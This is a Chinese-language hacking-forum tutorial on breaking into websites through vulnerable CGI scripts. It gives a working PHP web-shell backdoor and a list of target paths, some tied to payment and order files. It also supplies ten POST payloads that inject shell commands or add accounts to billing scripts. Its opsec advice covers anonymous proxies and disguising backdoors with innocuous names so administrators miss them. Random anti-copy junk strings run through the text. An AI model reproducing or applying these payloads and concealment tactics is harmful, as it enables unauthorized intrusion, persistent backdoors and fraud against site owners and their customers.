CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
5 w: G3 R/ |2 n- `1 x. l' P很开心来到贵论坛
; q; E/ A4 G) `这里让我感觉 很有技术交流的感觉
3 P* j4 ?# [. b4 o4 ?! l: e我会长长来玩的
: S0 y* }! G" p% X' r前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
1 r5 ]* X& t- C5 H2 r9 `6 I6 m我门都知道 国外伺服器大多是linux 平台
* J; k( s; H8 L: D: ^+ m! U7 I4 h所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
7 ]# P% R: c5 _7 F
只是个人在实务上一些经验
写的不好 请多多见谅喔
( b" _! X5 I$ t+ p# k在这里我简单分为几个部份一定要會的
讲解一下
9 u  t  ?( D9 P让没有基础的人很容易上手
2 H" ~2 t& `! X1 Y
以下内容跟帖回复才能看到
4 B* R% P2 o  e  G+ v==============================

/ n2 }0 |. Q. ]- g" f2 Q1 s第1部份: 何谓Shell?
! G9 ]8 U7 Z" j4 d  L. R0 SShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
! Y$ w5 C  i- B' P意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
1 M* J# G7 M7 P
+ F' Y4 K, v4 I对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
. ?& ^2 v) F$ I+ d" B所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
4 Y5 Q$ J) i  E4 b
第2部份: Unix 指令
以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
2 h; J+ i" S7 o6 U2 Jls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
1 U, B1 E8 i# j. {& D/ tcat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
# M& v4 E, L5 q1 F% C" d" I: Fman: 显示指令用法  
$ g8 @9 l' e& Q% P. Tman ls: 显示ls这指令的用法  
mkdir 建立目录
rmdir 删除目录
mv 移动档案
rm 删除档案

第3部份: Shell的使用
4 `- D  g+ w' u$ |0 Z! F6 @# w; `例如:
2 E+ ^' l5 F1 I. e/ F$ P& ghttp://site.com/refer.php
这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
6 z# h5 k: N5 m* ^8 o5 o- ]5 I<Input type="text" name="cmd">
<Input type="Submit">
) Y) f. I4 s; A1 o1 x</Form>
% F2 I+ K5 }/ n0 y<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
- i+ B9 z' n  m* j?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
2 s7 A& ~" k3 [7 b) O
8 b8 |: `* _" J) y: d1 W第4部份: 注意事项
6 `7 r; N" \2 A# |- S- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
  _; Q7 a: W& J4 P+ d- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
% ~( J3 h; |+ N8 N  W, c不容易被发现.
% Y$ D/ _! H* p- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
4 X0 z9 ?; z0 a2 t) _, ~! s在这里提供一些方法思路让大家学习一下

1 t! _: H% b! N' M! D2 W( e  s  N- u1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
% y" \* ]$ E1 @扫洞工具 如:triton..等等
E表
如
/cgi-bin/add-passwd.cgi
/ C& y7 [' }5 U" ^, i/WebShop/templates/cc.txt
) L3 i# t2 |4 b+ ^( p/Admin_files/order.log
0 y+ X% Z% s" q. k) Z) H& x/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
  g% Q. J/ x2 q8 j( L0 \4 nE表来源可以是网路收寻或是自己的0 day

2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
, L3 Z7 `9 i3 o/ k! q一般都是在IE里先看一下的,记住这个返回码哦
' S  P2 w. D  t5 w0 IERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
; ^+ y, @% I$ d( m8 ~* V# W4 l3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
6 t7 `, Q. ~  S9 ?! a3 H0 A& r我们要找post 的方法很多
4 r' p6 A) [  {; Y3 k# L可以是源代码分析 找出介质
6 g# B8 |) f$ ?, \$ v5 F或是用抓包工具 抓他的语法...等等
' Y( C! m# @" }( x( h8 a& s) U
以下我提供10个 cgi 洞以及使用方法post
1 f  U% m4 G3 r* f让大家可以针对网站去做扫描  
/index.cgi
8 L) _4 Q0 ^7 c. O% R% rwei=ren&gen=command
& X0 T+ `4 g7 H/passmaster.cgi
Action=Add&Username=Username&Password=Password
. U* c- S( k3 P$ G  o1 D- k/accountcreate.cgi
7 k! O0 w. Y$ @6 c) C' @: ^+ Fusername=username&password=password&ref1=|echo;ls|
, E9 q; v+ H7 V( p* _/form.cgi
' n8 l/ q7 Z/ L! F; C" zname=xxxx&email=email&subject=xxxx&response=|echo;ls|
6 F; n- G8 ?6 S3 l/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
, l! O4 G7 u7 o, t) t) |user=username&pass=Password&confirm=Password
/ y! F  u6 y6 h0 R/ccbill-local.asp
post_values=username:password
4 R) U* D0 m% e) {/count.cgi
pinfile=|echo;ls -la;exit|
6 _; U) y$ r; i) V9 N8 @/recon.cgi
' {+ ]" i6 q' [8 c. p" ~/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
9 Q; y" q& B% g2 w( o/verotelrum.pl
7 A1 u$ b1 G2 B& e0 `7 ~) rvercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|
3 T( |8 O1 \* A  {: u. E0 ?
" i6 T" t' m. J7 g% `8 W+ m今天就讲到这  感谢大家支持